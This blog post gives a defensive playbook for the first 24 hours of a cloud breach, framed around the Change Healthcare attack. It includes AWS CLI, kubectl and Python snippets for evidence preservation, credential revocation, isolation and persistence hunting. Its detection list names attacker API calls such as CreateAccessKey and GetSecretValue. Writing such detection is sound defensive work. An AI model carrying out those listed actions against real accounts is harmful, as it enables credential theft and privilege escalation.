
Cloud Incident Response Playbook: First 24 Hours After a Breach

July 8, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes container escape → Supply chain attack detection → Cloud lateral movement IAM → Detection engineering with eBPF → Cloud Incident Response Playbook

TL;DR

A cloud incident response playbook is not documentation you write after a breach — it is the executable sequence your team runs in the first 24 hours, rehearsed before the breach happens
The Change Healthcare attack (February 2024) disrupted $22 billion in medical claims processing and exposed 190 million Americans’ health data; the initial vector was a single set of stolen credentials and a Citrix portal with no MFA
Hours 0–1: declare the incident immediately, scope the blast radius, and start querying CloudTrail — do not investigate quietly
Hours 1–4: contain by revoking credentials and isolating infrastructure, but preserve evidence before any remediation — forensic snapshots and log exports before terminating anything
Hours 4–12: trace lateral movement via AssumeRole chains, identify persistence mechanisms (new IAM users/roles, Lambda backdoors, modified images), and confirm the full data access scope
Hours 12–24: eradicate from known-good baselines, not by patching compromised instances; recover dev → staging → prod; trigger regulatory notification timers

OWASP Mapping: Cross-cutting — incident response is not mapped to a single OWASP category because a breach can enter through any of them. IR quality is the backstop when prevention fails across A01 (broken access control), A07 (authentication failures), A08 (supply chain), and every other vector. The 24-hour window covered here applies regardless of initial entry point.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│            CLOUD INCIDENT RESPONSE: THE 24-HOUR SEQUENCE                │
│                                                                         │
│  ALERT                                                                  │
│    GuardDuty / Falco / anomaly detection fires                          │
│    ↓                                                                    │
│  TRIAGE  [0–1h]                                                         │
│    Declare incident → scope blast radius → open incident channel        │
│    Is the attacker still active? What data is at risk?                  │
│    ↓                                                                    │
│  CONTAIN  [1–4h]                                                        │
│    Revoke credentials → isolate compute → cordon K8s nodes              │
│    !! Do NOT terminate instances before snapshot !!                     │
│    ↓                                                                    │
│  PRESERVE  [1–4h, parallel with contain]                                │
│    EBS snapshots → CloudTrail log export → VPC Flow export              │
│    Forensic copy before any remediation changes the system state        │
│    ↓                                                                    │
│  INVESTIGATE  [4–12h]                                                   │
│    AssumeRole chain analysis → data access scope → persistence hunt     │
│    eBPF/Falco/Tetragon evidence if available (see EP11)                 │
│    ↓                                                                    │
│  ERADICATE  [12–24h]                                                    │
│    Remove persistence → rotate ALL credentials in blast radius          │
│    Replace compromised instances from known-good hardened AMI           │
│    ↓                                                                    │
│  RECOVER  [12–24h]                                                      │
│    dev → staging → prod sequence. Never prod-first.                     │
│    Verify monitoring before declaring all-clear                         │
│    ↓                                                                    │
│  LEARN                                                                  │
│    Post-incident review → timeline → regulatory notifications           │
│    Update playbook before the next incident                             │
└─────────────────────────────────────────────────────────────────────────┘

A cloud incident response playbook that exists only as a document is not an incident response capability. The sequence above is only useful if your team has rehearsed it — run it as a tabletop, run it in a chaos exercise, run it on a simulated breach in a non-prod account. The first time through this sequence should not be during an actual breach.

The Incident: Change Healthcare (February 2024)

On February 21, 2024, a ransomware attack hit Change Healthcare, a UnitedHealth Group subsidiary that processes roughly 50% of US medical claims. By the time containment completed, the damage was:

$22 billion in medical claims processing disrupted
190 million Americans’ health data potentially exposed
Hospitals unable to process insurance claims for weeks — some faced payroll crises because they couldn’t get reimbursed for care already delivered
A $22 million ransom paid to ALPHV/BlackCat, followed by ALPHV exit-scamming the affiliate (keeping the ransom), followed by RansomHub re-extorting with the same data

The initial vector: a Citrix remote access portal with no MFA enforced. A single set of stolen credentials. That’s it.

What made the outcome as severe as it was: the attackers had nine days of dwell time before the ransomware detonated. Nine days of lateral movement, data staging, and backup discovery before the detonation. The first 24 hours after detection determine whether you contain an intrusion or respond to a full-scale breach. The Change Healthcare team was responding to a full-scale breach because the first 24 hours happened nine days before anyone knew there was an incident.

Incident response quality scales directly with preparation investment. Teams that contain in four hours practiced containing in four hours. Teams that have no forensic evidence discover that during the investigation, not before it.

Hour 0–1: Detect and Declare

Step 1: Declare — Do Not Investigate Quietly

The instinct when something looks suspicious is to investigate before escalating. That instinct is wrong in cloud incidents. Every minute of quiet investigation is a minute the attacker may be escalating privileges, staging data, or discovering your backups.

Declare the incident immediately. The threshold for declaration is suspicion, not confirmation.

Who to notify in the first 15 minutes:
– CISO (or on-call security lead)
– Legal counsel (regulatory clock starts now; you need legal involved from minute one)
– On-call SRE lead (you will need infrastructure access)
– Communications lead (if external-facing systems are involved)

Operational setup:
1. Create a dedicated incident Slack channel: #incident-YYYY-MM-DD-brief-descriptor
2. Start an incident log — a shared doc, timestamped, with every action taken and by whom. This becomes your evidence log and your regulatory submission document.
3. Assign a scribe. The incident commander should not also be taking notes.

Step 2: Scope the Blast Radius

Before touching anything, answer three questions:

Is the attacker still active? (Is this ongoing or historical?)
What is the potential blast radius? (Which accounts, regions, services, principals are in scope?)
What data is at risk? (PII, PHI, credentials, intellectual property; which of these carry regulatory implications?)

Step 3: Initial CloudTrail Query

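# Run this before touching anything: you want a clean baseline
# Note: for assumed-role sessions the Username attribute is the role session name,
# not the role name. lookup-events returns management events from the last 90 days only.
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=suspected-principal \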
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].[EventTime,EventName,Resources[0].ResourceName]' \
  --output table

# If you don't know the principal yet — look for unusual API activity
# across all principals in the last hour
aws cloudtrail lookup-events \
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].{Time:EventTime,User:Username,Event:EventName,Source:EventSource}' \
  --output json | \
  jq 'sort_by(.Time) | reverse | .[:50]'
# Look for: CreateUser, AttachRolePolicy, PutRolePolicy, CreateAccessKey,
#           GetSecretValue, ListBuckets, DescribeInstances in rapid succession

# Check GuardDuty for the triggering finding
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty get-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-ids $(aws guardduty list-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-criteria '{
      "Criterion": {
        "updatedAt": {"Gte": '$(date -d '24 hours ago' +%s000)'}
      }
    }' \
    --sort-criteria '{"AttributeName":"updatedAt","OrderBy":"DESC"}' \
    --max-results 10 \
    --query 'FindingIds' --output text) | \
  jq '.Findings[] | {type: .Type, severity: .Severity, time: .UpdatedAt, detail: .Description}'
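
The "rapid succession" check in the second CloudTrail query is easier to apply consistently with a small script. The following is a minimal Python sketch, not part of the original playbook. It assumes the JSON array from that query has been loaded into a list of dicts with the Time, User, and Event keys, and that Time is an ISO 8601 string with a numeric offset (some CLI versions emit epoch numbers instead). The function name flag_bursts, the five-minute window, and the threshold of three are illustrative choices, and the sample events are synthetic.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Event names the playbook lists as worth a second look.
SENSITIVE = {
    "CreateUser", "AttachRolePolicy", "PutRolePolicy", "CreateAccessKey",
    "GetSecretValue", "ListBuckets", "DescribeInstances",
}

def flag_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Return {user: peak count} for users with >= threshold sensitive calls in one window."""
    by_user = defaultdict(list)
    for event in events:
        if event.get("Event") in SENSITIVE and event.get("User"):
            by_user[event["User"]].append(datetime.fromisoformat(event["Time"]))
    flagged = {}
    for user, times in by_user.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):
            # Shrink the window from the left until it spans at most `window`.
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[user] = peak
    return flagged

# Synthetic sample in the shape of the query output (values are made up).
sample = [
    {"Time": "2024-02-21T12:51:00+00:00", "User": "session-a", "Event": "CreateUser"},
    {"Time": "2024-02-21T12:52:00+00:00", "User": "session-a", "Event": "CreateAccessKey"},
    {"Time": "2024-02-21T12:53:30+00:00", "User": "session-a", "Event": "AttachRolePolicy"},
    {"Time": "2024-02-21T09:00:00+00:00", "User": "deploy-bot", "Event": "DescribeInstances"},
    {"Time": "2024-02-21T12:00:00+00:00", "User": "deploy-bot", "Event": "DescribeInstances"},
]
flagged = flag_bursts(sample)
print(flagged)
```

A principal that appears here is a candidate for the blast-radius scoping in Step 2, not a confirmed compromise; automation roles can legitimately produce bursts.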

Hour 1–4: Contain Without Destroying Evidence

The central tension in early containment: you need to stop the bleeding, but you also need the evidence. Terminating a compromised EC2 instance stops the threat on that instance — it also destroys the process table, network connections, in-memory artifacts, and filesystem state that the investigation needs.

The order of operations:
1. Preserve (snapshot, export logs)
2. Contain (revoke credentials, isolate network)
3. Never terminate before step 1

Evidence Preservation (Before Any Containment Action)

# Create EBS snapshots of ALL volumes on compromised instances
# Do this FIRST — before network isolation, before anything
aws ec2 describe-instances \
  --instance-ids i-compromised-instance-id \
  --query 'Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId' \
  --output text | tr '\t' '\n' | \
  while read vol_id; do
    echo "Snapshotting volume: ${vol_id}"
    aws ec2 create-snapshot \
      --volume-id "${vol_id}" \
      --description "IR evidence - $(date --iso-8601) - ${vol_id}" \
      --tag-specifications "ResourceType=snapshot,Tags=[{Key=incident,Value=active},{Key=preserve,Value=legal-hold}]"
  done

# Export CloudTrail logs for the incident window to a local IR evidence directory
# Use a time window that starts 24 hours before the suspected compromise
# (compromise suspected on 2024-02-21, so the export starts at 2024-02-20)
aws s3 sync \
  s3://your-cloudtrail-bucket/AWSLogs/123456789012/CloudTrail/ \
  ./ir-evidence/cloudtrail/ \
  --exclude "*" \
  --include "*/2024/02/20/*" \
  --include "*/2024/02/21/*" \
  --include "*/2024/02/22/*"

# Export VPC Flow Logs for the incident window
# These show network connections that CloudTrail doesn't capture
aws logs filter-log-events \
  --log-group-name /aws/vpc/flowlogs \
  --start-time $(date -d '24 hours ago' +%s000) \
  --end-time $(date +%s000) \
  --query 'events[*].message' \
  --output text > ./ir-evidence/vpc-flow-logs.txt

Containment Action 1: Revoke the Compromised Credential

# Option A: Disable an IAM user's access key (reversible — preserves key for forensics)
aws iam update-access-key \
  --user-name compromised-user \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive

# Option B: If the compromised principal is an IAM role —
# attach a deny-all inline policy (fastest, takes effect immediately)
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-deny-all \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Sid": "IncidentDenyAll",
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*"
      }
    ]
  }'

# Option C: Revoke only the sessions that already exist
# (the same approach as the IAM console's "Revoke active sessions" action)
# The Option B deny-all blocks every request made with the role, including
# sessions issued after you attach it, so legitimate workloads stay broken
# until you remove it. Conditioning the deny on aws:TokenIssueTime blocks only
# sessions issued before the cutoff; workloads that re-assume the role afterwards
# get working credentials. Use it once the attacker can no longer assume the role.
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-revoke-older-sessions \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {
          "DateLessThan": {
            "aws:TokenIssueTime": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
          }
        }
      }
    ]
  }'
# This denies all requests where the token was issued before right now,
# effectively invalidating all existing sessions for this role

Containment Action 2: Isolate Affected EC2 Instances

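# Create an isolation security group: no ingress, no egress
# except SSH from your IR bastion (for forensic access if needed)
ISOLATION_SG=$(aws ec2 create-security-group \
  --group-name "incident-isolation-$(date +%Y%m%d)" \
  --description "Incident isolation - no network access except IR bastion" \
  --vpc-id vpc-your-vpc-id \
  --query 'GroupId' \
  --output text)

echo "Isolation SG created: ${ISOLATION_SG}"

# A new security group is created with a default allow-all egress rule.
# Revoke it, or the "isolated" instance can still open outbound connections.
aws ec2 revoke-security-group-egress \
  --group-id "${ISOLATION_SG}" \
  --ip-permissions '[{"IpProtocol":"-1","IpRanges":[{"CidrIp":"0.0.0.0/0"}]}]'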

# Add ingress rule: only from IR bastion (for forensic access)
# Remove this rule entirely if you don't need it
aws ec2 authorize-security-group-ingress \
  --group-id "${ISOLATION_SG}" \
  --protocol tcp \
  --port 22 \
  --cidr YOUR-IR-BASTION-IP/32

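# Apply the isolation SG to the compromised instance
# This replaces all existing security groups. New connections are blocked, but
# connections that were already established and tracked can persist until they
# close or time out, so confirm in VPC Flow Logs that traffic has stopped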
aws ec2 modify-instance-attribute \
  --instance-id i-compromised-instance-id \
  --groups "${ISOLATION_SG}"

Important: Do not terminate the instance. The isolated instance remains available for forensic analysis via the IR bastion. Termination destroys volatile evidence. You terminate after the investigation is complete and legal has cleared the evidence for destruction.

Containment Action 3: Kubernetes — Cordon, Don’t Delete

# Cordon the compromised node — prevents new pod scheduling
kubectl cordon node/compromised-node-name

# Label the node for IR tracking
kubectl label node/compromised-node-name incident=active preserve=legal-hold

# If a specific pod is the concern — do NOT kubectl delete pod
# Instead, collect forensic information first
POD_NAME="compromised-pod"
NAMESPACE="production"

# Capture the full pod spec and status
kubectl get pod "${POD_NAME}" -n "${NAMESPACE}" -o json > \
  ./ir-evidence/pod-spec-${POD_NAME}.json

# Capture environment variables (may contain credential evidence)
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- env > \
  ./ir-evidence/pod-env-${POD_NAME}.txt 2>/dev/null

# Capture running processes
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ps auxf > \
  ./ir-evidence/pod-processes-${POD_NAME}.txt 2>/dev/null

# Capture network connections
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ss -tunapw > \
  ./ir-evidence/pod-netstat-${POD_NAME}.txt 2>/dev/null

# Now you can delete the pod if needed — you have the evidence

Hour 4–12: Investigate the Blast Radius

Containment stops the active threat. Investigation answers: what did they do, where did they go, and what did they touch?

Trace the Lateral Movement

The most important lateral movement mechanism in AWS is AssumeRole chaining — a compromised principal assumes a role, which has permissions to assume another role, building a privilege escalation path. IAM attack path reconstruction requires following this chain through CloudTrail.

# Find all AssumeRole events from the compromised principal
# This shows every role the attacker assumed after initial compromise
# (AssumeRole calls made by AWS services carry no userIdentity.arn,
#  so default it to "" to keep jq from failing on null)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    select((.userIdentity.arn // "") | contains("compromised-role")) | 
    {
      time: .eventTime,
      caller: .userIdentity.arn,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

# Follow the chain — get ALL roles assumed during the incident window
# regardless of source, then trace connections manually
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq -r '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    [.eventTime, .userIdentity.arn, .requestParameters.roleArn, .sourceIPAddress] | 
    @tsv' | \
  sort -k1
# Build the graph manually: which ARN called AssumeRole for which target role
# Any role not in your expected deployment automation is suspicious
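
Building the graph by hand gets error-prone once the chain crosses accounts. The following is a minimal Python sketch, not part of the original playbook, that walks the chain from the TSV produced by the second query (time, caller ARN, target role ARN, source IP). The helper names role_key and trace_chain are hypothetical, the sample rows are synthetic, and the matching rests on one assumption: an assumed-role session ARN and the role ARN it came from share the same account ID and role name.

```python
from collections import defaultdict, deque

def role_key(arn):
    """Reduce a role ARN or an assumed-role session ARN to 'account/RoleName'."""
    parts = arn.split(":", 5)
    if len(parts) < 6:
        return arn
    account, resource = parts[4], parts[5]
    if resource.startswith("assumed-role/"):
        return f"{account}/{resource.split('/')[1]}"
    if resource.startswith("role/"):
        return f"{account}/{resource.rsplit('/', 1)[-1]}"
    return arn  # IAM users and other principals are kept as-is

def trace_chain(tsv_text, start_role):
    """Breadth-first walk of AssumeRole hops starting at start_role."""
    edges = defaultdict(set)
    for line in tsv_text.strip().splitlines():
        _time, caller, target, _ip = line.split("\t")
        if caller and target:
            edges[role_key(caller)].add(role_key(target))
    queue = deque(k for k in sorted(edges) if k.endswith("/" + start_role))
    seen, hops = set(queue), []
    while queue:
        node = queue.popleft()
        for nxt in sorted(edges.get(node, ())):
            hops.append((node, nxt))
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    # Every account ID reached along the chain needs its own CloudTrail pull.
    accounts = sorted({k.split("/")[0] for k in seen if not k.startswith("arn:")})
    return hops, accounts

# Synthetic rows in the column order of the TSV query above.
SAMPLE = "\n".join([
    "2024-02-21T12:51:00Z\tarn:aws:sts::111111111111:assumed-role/compromised-role/i-0abc"
    "\tarn:aws:iam::111111111111:role/deploy\t203.0.113.7",
    "2024-02-21T13:02:00Z\tarn:aws:sts::111111111111:assumed-role/deploy/sess1"
    "\tarn:aws:iam::222222222222:role/prod-admin\t203.0.113.7",
    "2024-02-21T13:30:00Z\tarn:aws:sts::111111111111:assumed-role/ci-runner/build42"
    "\tarn:aws:iam::111111111111:role/artifact-read\t10.0.4.12",
])
hops, accounts = trace_chain(SAMPLE, "compromised-role")
for src, dst in hops:
    print(f"{src} -> {dst}")
print("accounts in scope:", accounts)
```

The unrelated ci-runner hop is left out of the result because it is not reachable from the starting role; the accounts list is the set of accounts whose CloudTrail logs need to be pulled.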

Find What Data Was Accessed

# S3 GetObject events: shows every object the attacker read
# NOTE: S3 data events are NOT enabled by default in CloudTrail, and
# lookup-events never returns data events even when they are enabled
# (it serves management events only). Query the trail's log files instead,
# for example the copy synced to ./ir-evidence/cloudtrail/ during preservation.
# If data events were not pre-enabled, this returns nothing useful.
find ./ir-evidence/cloudtrail/ -name '*.json.gz' -exec zcat {} + | \
  jq '.Records[] | 
    select(.eventName == "GetObject") | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      bucket: .requestParameters.bucketName,
      key: .requestParameters.key,
      source_ip: .sourceIPAddress
    }'

# Secrets Manager — what secrets were accessed?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      secret: .requestParameters.secretId,
      source_ip: .sourceIPAddress
    }'

# KMS — what was decrypted?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=Decrypt \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      key_id: .requestParameters.keyId,
      source_ip: .sourceIPAddress
    }'
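
The raw event stream still has to be reduced to a statement of scope: which principal read which objects. The following is a minimal Python sketch, not part of the original playbook. It assumes the GetObject records above have been collected into a list of dicts with the user, bucket, and key fields; the function name access_scope and the sample records are hypothetical.

```python
from collections import defaultdict

def access_scope(records):
    """Group object reads by principal and bucket, de-duplicating keys."""
    scope = defaultdict(lambda: defaultdict(set))
    for rec in records:
        if rec.get("bucket") and rec.get("key"):
            scope[rec.get("user") or "unknown"][rec["bucket"]].add(rec["key"])
    return {
        user: {bucket: sorted(keys) for bucket, keys in buckets.items()}
        for user, buckets in scope.items()
    }

# Synthetic records in the shape emitted by the GetObject query above.
SESSION = "arn:aws:sts::111111111111:assumed-role/compromised-role/i-0abc"
records = [
    {"user": SESSION, "bucket": "customer-data", "key": "exports/2024-01.csv"},
    {"user": SESSION, "bucket": "customer-data", "key": "exports/2024-02.csv"},
    {"user": SESSION, "bucket": "customer-data", "key": "exports/2024-01.csv"},
]
scope = access_scope(records)
print(scope)
```

The de-duplicated key list per bucket is the input for classifying what was exposed, which in turn drives the notification decisions later in the playbook.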

Hunt for Persistence Mechanisms

Attackers establish persistence before detonating ransomware or before exfiltrating at scale. The most common persistence mechanisms in AWS:

# New IAM users created during the incident window
aws iam list-users \
  --query 'Users[?CreateDate>=`2024-02-21T00:00:00Z`].[UserName,CreateDate,UserId]' \
  --output table

# New IAM roles created during the incident window
aws iam list-roles \
  --query 'Roles[?CreateDate>=`2024-02-21T00:00:00Z`].[RoleName,CreateDate,RoleId]' \
  --output table

# New IAM access keys created for existing users
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateAccessKey \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, user: .requestParameters.userName, by: .userIdentity.arn}'

# Lambda functions with recent code modifications
# (Lambda is a common backdoor target — function code is easy to modify)
aws lambda list-functions \
  --query 'Functions[?LastModified>=`2024-02-21`].[FunctionName,LastModified,Runtime]' \
  --output table

# For any recently modified function — check for unexpected environment variables
aws lambda get-function-configuration \
  --function-name suspicious-function-name \
  --query '{env: Environment.Variables, role: Role, handler: Handler}'

# CloudFormation stacks created during the incident window
# (repeat with AttributeValue=UpdateStack to catch modified stacks)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateStack \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, stack: .requestParameters.stackName, by: .userIdentity.arn}'

# EC2 user-data modifications (backdoor via user data on restart)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ModifyInstanceAttribute \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | select(.requestParameters | has("userData")) | {time: .eventTime, instance: .requestParameters.instanceId, by: .userIdentity.arn}'

eBPF and Falco Evidence (If Available)

If your environment runs Falco or Cilium Tetragon (see detection engineering with eBPF), the kernel-level telemetry from EP11 is now forensic evidence:

# Tetragon: export process execution events for the incident window
# Tetragon writes to /var/log/tetragon/tetragon.log on package installs;
# Helm deployments typically export to /var/run/cilium/tetragon/tetragon.log
# Filter by the time window and affected pod/node

# On the affected node (or via log aggregation if you ship to a SIEM):
cat /var/log/tetragon/tetragon.log | \
  jq 'select(.time >= "2024-02-21T00:00:00Z" and .time <= "2024-02-22T23:59:59Z") |
    select(.process_exec != null) |
    {
      time: .time,
      pod: .process_exec.process.pod.name,
      ns: .process_exec.process.pod.namespace,
      binary: .process_exec.process.binary,
      args: .process_exec.process.arguments,
      parent: .process_exec.parent.binary
    }' | head -100

# Falco: pull alerts from the incident window out of your SIEM/log store
# If you're running Falco with file output:
grep "2024-02-21\|2024-02-22" /var/log/falco/events.json | \
  jq 'select(.priority == "Critical" or .priority == "Error") |
    {time: .time, rule: .rule, output: .output, pod: .output_fields."k8s.pod.name"}' | \
  head -50

Process lineage from Tetragon (which parent process spawned which child) is often the clearest signal of container escape or lateral movement within a cluster. It shows attack paths that API-layer logging cannot reconstruct.
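
To make the parent-child reconstruction concrete, here is a minimal Python sketch, not part of the original playbook. It assumes each log line is a JSON event whose process_exec.process and process_exec.parent objects carry exec_id, parent_exec_id, and binary fields; verify those field names against your own Tetragon output before relying on it. The function name lineage and the helper _exec are hypothetical, and the sample events are synthetic.

```python
import json

def lineage(log_lines, binary_suffix):
    """Return the ancestor chain (oldest first) for the first exec matching binary_suffix."""
    procs = {}
    for line in log_lines:
        exec_event = json.loads(line).get("process_exec")
        if not exec_event:
            continue  # skip exits, kprobes, and other event types
        # Index the process first so its own record wins over a parent stub.
        for proc in (exec_event.get("process"), exec_event.get("parent")):
            if proc and proc.get("exec_id"):
                procs.setdefault(proc["exec_id"], proc)
    target = next(
        (p for p in procs.values() if p.get("binary", "").endswith(binary_suffix)),
        None,
    )
    chain, seen = [], set()
    while target and target["exec_id"] not in seen:
        seen.add(target["exec_id"])  # guard against malformed cycles
        chain.append(target["binary"])
        target = procs.get(target.get("parent_exec_id"))
    return chain[::-1]

def _exec(exec_id, binary, parent_id, parent_binary):
    """Build one synthetic process_exec line (hypothetical test data)."""
    return json.dumps({"process_exec": {
        "process": {"exec_id": exec_id, "binary": binary, "parent_exec_id": parent_id},
        "parent": {"exec_id": parent_id, "binary": parent_binary},
    }})

SAMPLE = [
    _exec("a1", "/usr/sbin/nginx", "a0", "/usr/bin/containerd-shim"),
    _exec("a2", "/bin/sh", "a1", "/usr/sbin/nginx"),
    json.dumps({"process_exit": {"process": {"exec_id": "zz"}}}),
    _exec("a3", "/usr/bin/curl", "a2", "/bin/sh"),
]
chain = lineage(SAMPLE, "/curl")
print(" -> ".join(chain))
```

A web server spawning a shell that then runs curl is the kind of chain that API-layer logs never show; the lineage only goes back as far as the exec events retained in the log.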

Hour 12–24: Eradicate and Recover

Remove Persistence

Work through the persistence findings from the investigation phase in order:

# Delete unauthorized IAM users created during the incident
# First: disable their access keys
aws iam list-access-keys --user-name attacker-created-user \
  --query 'AccessKeyMetadata[].AccessKeyId' --output text | \
  tr '\t' '\n' | \
  while read key_id; do
    aws iam update-access-key --user-name attacker-created-user \
      --access-key-id "${key_id}" --status Inactive
  done

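# Then: detach managed policies, delete inline policies, remove from groups,
# delete the login profile and access keys, and only then delete the user.
# delete-user fails with a DeleteConflict error while any of these remain.
aws iam detach-user-policy --user-name attacker-created-user \
  --policy-arn arn:aws:iam::123456789012:policy/attached-policy
aws iam delete-login-profile --user-name attacker-created-user  # skip if no console password exists
aws iam delete-access-key --user-name attacker-created-user \
  --access-key-id AKIAIOSFODNN7EXAMPLE  # repeat for every key listed above
aws iam delete-user --user-name attacker-created-user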

# Rotate ALL credentials that could have been accessed during the incident window
# Not just the initial compromise — every secret in the blast radius

# List all IAM user access keys in the affected account
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "${user}" \
      --query 'AccessKeyMetadata[?Status==`Active`].{User:UserName,Key:AccessKeyId}' \
      --output json
  done | jq -s 'flatten'
# For each key: create new key → update application config → delete old key

# Remove Lambda backdoors — restore from last known-good deployment
# Do NOT patch the modified function — replace the entire deployment package
aws lambda update-function-code \
  --function-name backdoored-function \
  --s3-bucket your-code-bucket \
  --s3-key known-good/function-v1.2.3.zip

# Reset environment variables (remove anything added during incident)
aws lambda update-function-configuration \
  --function-name backdoored-function \
  --environment 'Variables={EXPECTED_VAR=expected_value}'

Replace Compromised Instances From Known-Good Baselines

Do not patch a compromised instance and return it to production. The instance’s integrity is unknown — the attacker may have modified binaries, installed kernel modules, or altered the init system in ways that a filesystem scan won’t catch.

Replace from a known-good hardened image:

# Launch a replacement from a hardened baseline AMI
# If you're running a Stratum-built image pipeline, this is where it pays off:
# you have a signed, hardened, versioned AMI to replace from

aws ec2 run-instances \
  --image-id ami-known-good-hardened-baseline \
  --instance-type t3.medium \
  --subnet-id subnet-your-private-subnet \
  --security-group-ids sg-your-normal-sg \
  --iam-instance-profile Name=your-instance-profile \
  --tag-specifications \
    'ResourceType=instance,Tags=[{Key=Name,Value=replacement-post-incident},{Key=incident-id,Value=2024-02-21}]' \
  --user-data file://init-script.sh

If you don’t have a hardened AMI pipeline, this incident is the forcing function to build one. Rebuilding from a generic AMI means re-running your full configuration management stack and hoping nothing drifts. Rebuilding from a known-good hardened baseline means launching and verifying.

Recovery Sequence

dev → staging → prod

Not prod first. Not all at once.

Bring dev back up. Verify monitoring and alerting are functional — specifically, verify that the detection that fired during this incident still fires in dev. If you can’t reproduce the detection in dev, you don’t know if it’s working.

Promote to staging. Run your standard smoke tests plus whatever you added to your detection suite based on this incident.

Promote to prod only after staging has been clean for at least four hours.

The Post-Incident Review

Schedule it within 72 hours of resolution. Not a blame session — a timeline reconstruction and process improvement meeting. What to document:

Timeline reconstruction (to the minute):

Time	Event	Who	Evidence Source
Feb 21 12:47	Initial compromise — credential used from unexpected IP	Attacker	CloudTrail
Feb 21 12:51	First AssumeRole to production role	Attacker	CloudTrail
Feb 21 13:15	First S3 GetObject on customer-data bucket	Attacker	CloudTrail data events
Feb 21 21:30	GuardDuty fires: Exfiltration:IAMUser/AnomalousBehavior	GuardDuty	GuardDuty finding
Feb 21 21:35	On-call engineer acknowledges alert	SRE	PagerDuty
Feb 21 21:50	Incident declared, channel created	IR lead	Slack

Key metrics to measure and improve:

Mean Time to Detect (MTTD): Time between initial compromise and first alert
Mean Time to Declare (MTTDeclare): Time between first alert and formal incident declaration
Mean Time to Contain (MTTC): Time between declaration and credential revocation + network isolation
Blast radius: Accounts, services, data classifications confirmed in scope
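
For a single incident these metrics are plain timestamp differences; the "mean" comes from averaging them across incidents. The following is a minimal Python sketch, not part of the original playbook, using the times from the sample timeline above. The year 2024 is assumed from the incident window used throughout, the names minutes_between and timeline are hypothetical, and time to contain is left out because the sample timeline records no containment time.

```python
from datetime import datetime

FMT = "%Y-%m-%d %H:%M"

def minutes_between(start, end):
    """Whole minutes elapsed between two 'YYYY-MM-DD HH:MM' timestamps."""
    delta = datetime.strptime(end, FMT) - datetime.strptime(start, FMT)
    return int(delta.total_seconds() // 60)

# Times taken from the sample timeline (year assumed).
timeline = {
    "compromise": "2024-02-21 12:47",
    "first_alert": "2024-02-21 21:30",
    "declared": "2024-02-21 21:50",
}

time_to_detect = minutes_between(timeline["compromise"], timeline["first_alert"])
time_to_declare = minutes_between(timeline["first_alert"], timeline["declared"])

print(f"time to detect:  {time_to_detect} min")
print(f"time to declare: {time_to_declare} min")
```

In this sample, detection took 523 minutes (8 hours 43 minutes) and declaration took 20 minutes, so detection is where the time went.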

Regulatory notification requirements (know these before the incident):

GDPR: 72 hours from discovery to supervisory authority notification
HIPAA: 60 days from discovery to individual notification; 60 days to HHS for breaches affecting 500+ individuals
